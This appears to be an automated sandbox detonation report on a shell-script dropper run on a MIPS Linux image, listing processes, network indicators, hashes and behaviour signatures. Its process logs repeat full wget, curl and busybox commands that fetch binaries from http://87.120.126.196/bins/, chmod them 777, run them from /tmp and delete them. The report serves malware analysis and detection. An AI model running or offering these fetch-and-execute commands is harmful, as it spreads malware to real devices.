[chmod 777 yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV]
/tmp/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV
[./yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV]
/bin/rm
[rm yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV]
/usr/bin/wget
[wget http://87.120.126.196/bins/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad]
/bin/chmod
[chmod 777 ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad]
/tmp/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad
[./ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad]
/bin/rm
[rm ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad]
/usr/bin/wget
[wget http://87.120.126.196/bins/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad]
/bin/chmod
[chmod 777 ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad]
/tmp/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad
[./ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad]
/bin/rm
[rm ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad]
/usr/bin/wget
[wget http://87.120.126.196/bins/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff]
/bin/chmod
[chmod 777 q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff]
/tmp/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff
[./q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff]
/bin/rm
[rm q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff]
/usr/bin/wget
[wget http://87.120.126.196/bins/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp]
/bin/chmod
[chmod 777 KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp]
/tmp/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp
[./KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp]
/bin/rm
[rm KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp]
/usr/bin/wget
[wget http://87.120.126.196/bins/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV]
/bin/chmod
[chmod 777 yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV]
/tmp/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV
[./yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV]
/bin/rm
[rm yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV]
/usr/bin/wget
[wget http://87.120.126.196/bins/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3]
/bin/chmod
[chmod 777 3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3]
/tmp/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3
[./3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3]
/bin/rm
[rm 3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3]
/usr/bin/wget
[wget http://87.120.126.196/bins/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl]
/bin/chmod
[chmod 777 aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl]
/tmp/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl
[./aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl]
/bin/rm
[rm aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl]
/usr/bin/wget
[wget http://87.120.126.196/bins/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV]
/bin/chmod
[chmod 777 c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV]
/tmp/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV
[./c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV]
/bin/rm
[rm c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV]
/usr/bin/wget
[wget http://87.120.126.196/bins/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC]
/bin/chmod
[chmod 777 fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC]
/tmp/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC
[./fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC]
/bin/rm
[rm fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC]
/usr/bin/wget
[wget http://87.120.126.196/bins/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe]
/bin/chmod
[chmod 777 l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe]
/tmp/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe
[./l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe]
/bin/rm
[rm l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe]
/usr/bin/wget
[wget http://87.120.126.196/bins/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB]
/bin/chmod
[chmod 777 vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB]
/tmp/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB
[./vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB]
/bin/rm
[rm vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB]
/usr/bin/wget
[wget http://87.120.126.196/bins/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr]
/bin/chmod
[chmod 777 mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr]
/tmp/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr
[./mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr]
/bin/rm
[rm mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr]
/usr/bin/wget
[wget http://87.120.126.196/bins/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm]
/bin/chmod
[chmod 777 EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm]
/tmp/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm
[./EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm]
/bin/rm
[rm EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm]
/usr/bin/wget
[wget http://87.120.126.196/bins/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr]
/bin/chmod
[chmod 777 Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr]
/tmp/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr
[./Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr]
/bin/rm
[rm Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr]
/usr/bin/wget
[wget http://87.120.126.196/bins/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC]
/bin/chmod
[chmod 777 PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC]
/tmp/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC
[./PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC]
/bin/rm
[rm PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC]
Network
| Country | Destination | Domain | Proto |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
Files
/tmp/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
Analysis: behavioral4
Detonation Overview
Submitted
2024-10-25 01:17
Reported
2024-10-25 01:20
Platform
debian9-mipsel-20240611-en
Max time kernel
80s
Max time network
82s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC | /tmp/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC | N/A |
| N/A | /tmp/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe | /tmp/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe | N/A |
| N/A | /tmp/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB | /tmp/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB | N/A |
| N/A | /tmp/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3 | /tmp/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3 | N/A |
| N/A | /tmp/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl | /tmp/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl | N/A |
| N/A | /tmp/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV | /tmp/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV | N/A |
| N/A | /tmp/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr | /tmp/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr | N/A |
| N/A | /tmp/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr | /tmp/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr | N/A |
| N/A | /tmp/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC | /tmp/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC | N/A |
| N/A | /tmp/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm | /tmp/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm | N/A |
| N/A | /tmp/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff | /tmp/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff | N/A |
| N/A | /tmp/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp | /tmp/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp | N/A |
| N/A | /tmp/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV | /tmp/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV | N/A |
| N/A | /tmp/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad | /tmp/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad | N/A |
| N/A | /tmp/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad | /tmp/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad | N/A |
| N/A | /tmp/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff | /tmp/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff | N/A |
| N/A | /tmp/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp | /tmp/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp | N/A |
| N/A | /tmp/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV | /tmp/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV | N/A |
| N/A | /tmp/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3 | /tmp/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3 | N/A |
| N/A | /tmp/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl | /tmp/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl | N/A |
| N/A | /tmp/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV | /tmp/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV | N/A |
| N/A | /tmp/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC | /tmp/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC | N/A |
| N/A | /tmp/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe | /tmp/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe | N/A |
| N/A | /tmp/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB | /tmp/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB | N/A |
| N/A | /tmp/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr | /tmp/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr | N/A |
| N/A | /tmp/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm | /tmp/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm | N/A |
| N/A | /tmp/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr | /tmp/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr | N/A |
| N/A | /tmp/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC | /tmp/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /tmp/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /tmp/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV | /usr/bin/curl | N/A |
| File opened for modification | /tmp/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC | /usr/bin/curl | N/A |
| File opened for modification | /tmp/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC | /usr/bin/curl | N/A |
| File opened for modification | /tmp/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff | /usr/bin/curl | N/A |
| File opened for modification | /tmp/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad | /usr/bin/curl | N/A |
| File opened for modification | /tmp/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB | /usr/bin/curl | N/A |
| File opened for modification | /tmp/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe | /usr/bin/curl | N/A |
| File opened for modification | /tmp/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm | /usr/bin/curl | N/A |
| File opened for modification | /tmp/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff | /usr/bin/curl | N/A |
| File opened for modification | /tmp/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV | /usr/bin/curl | N/A |
| File opened for modification | /tmp/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC | /usr/bin/curl | N/A |
| File opened for modification | /tmp/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp | /usr/bin/curl | N/A |
| File opened for modification | /tmp/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr | /usr/bin/curl | N/A |
| File opened for modification | /tmp/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr | /usr/bin/curl | N/A |
| File opened for modification | /tmp/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl | /usr/bin/curl | N/A |
| File opened for modification | /tmp/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm | /usr/bin/curl | N/A |
| File opened for modification | /tmp/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr | /usr/bin/curl | N/A |
| File opened for modification | /tmp/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl | /usr/bin/curl | N/A |
| File opened for modification | /tmp/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV | /usr/bin/curl | N/A |
| File opened for modification | /tmp/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC | /usr/bin/curl | N/A |
| File opened for modification | /tmp/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB | /usr/bin/curl | N/A |
| File opened for modification | /tmp/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad | /usr/bin/curl | N/A |
Processes
/tmp/2100317beeaace5a46e14c17593a94ff209c3b76f3d27dab340222562ec6e760.sh
[/tmp/2100317beeaace5a46e14c17593a94ff209c3b76f3d27dab340222562ec6e760.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://87.120.126.196/bins/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC]
/bin/chmod
[chmod 777 fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC]
/tmp/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC
[./fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC]
/bin/rm
[rm fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC]
/usr/bin/wget
[wget http://87.120.126.196/bins/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe]
/bin/chmod
[chmod 777 l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe]
/tmp/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe
[./l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe]
/bin/rm
[rm l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe]
/usr/bin/wget
[wget http://87.120.126.196/bins/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB]
/bin/chmod
[chmod 777 vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB]
/tmp/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB
[./vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB]
/bin/rm
[rm vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB]
/usr/bin/wget
[wget http://87.120.126.196/bins/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3]
/bin/chmod
[chmod 777 3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3]
/tmp/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3
[./3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3]
/bin/rm
[rm 3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3]
/usr/bin/wget
[wget http://87.120.126.196/bins/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl]
/bin/chmod
[chmod 777 aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl]
/tmp/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl
[./aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl]
/bin/rm
[rm aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl]
/usr/bin/wget
[wget http://87.120.126.196/bins/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV]
/bin/chmod
[chmod 777 c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV]
/tmp/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV
[./c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV]
/bin/rm
[rm c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV]
/usr/bin/wget
[wget http://87.120.126.196/bins/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr]
/bin/chmod
[chmod 777 mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr]
/tmp/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr
[./mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr]
/bin/rm
[rm mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr]
/usr/bin/wget
[wget http://87.120.126.196/bins/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr]
/bin/chmod
[chmod 777 Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr]
/tmp/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr
[./Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr]
/bin/rm
[rm Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr]
/usr/bin/wget
[wget http://87.120.126.196/bins/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC]
/bin/chmod
[chmod 777 PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC]
/tmp/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC
[./PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC]
/bin/rm
[rm PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC]
/usr/bin/wget
[wget http://87.120.126.196/bins/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm]
/bin/chmod
[chmod 777 EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm]
/tmp/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm
[./EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm]
/bin/rm
[rm EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm]
/usr/bin/wget
[wget http://87.120.126.196/bins/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff]
/bin/chmod
[chmod 777 q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff]
/tmp/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff
[./q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff]
/bin/rm
[rm q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff]
/usr/bin/wget
[wget http://87.120.126.196/bins/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp]
/bin/chmod
[chmod 777 KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp]
/tmp/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp
[./KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp]
/bin/rm
[rm KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp]
/usr/bin/wget
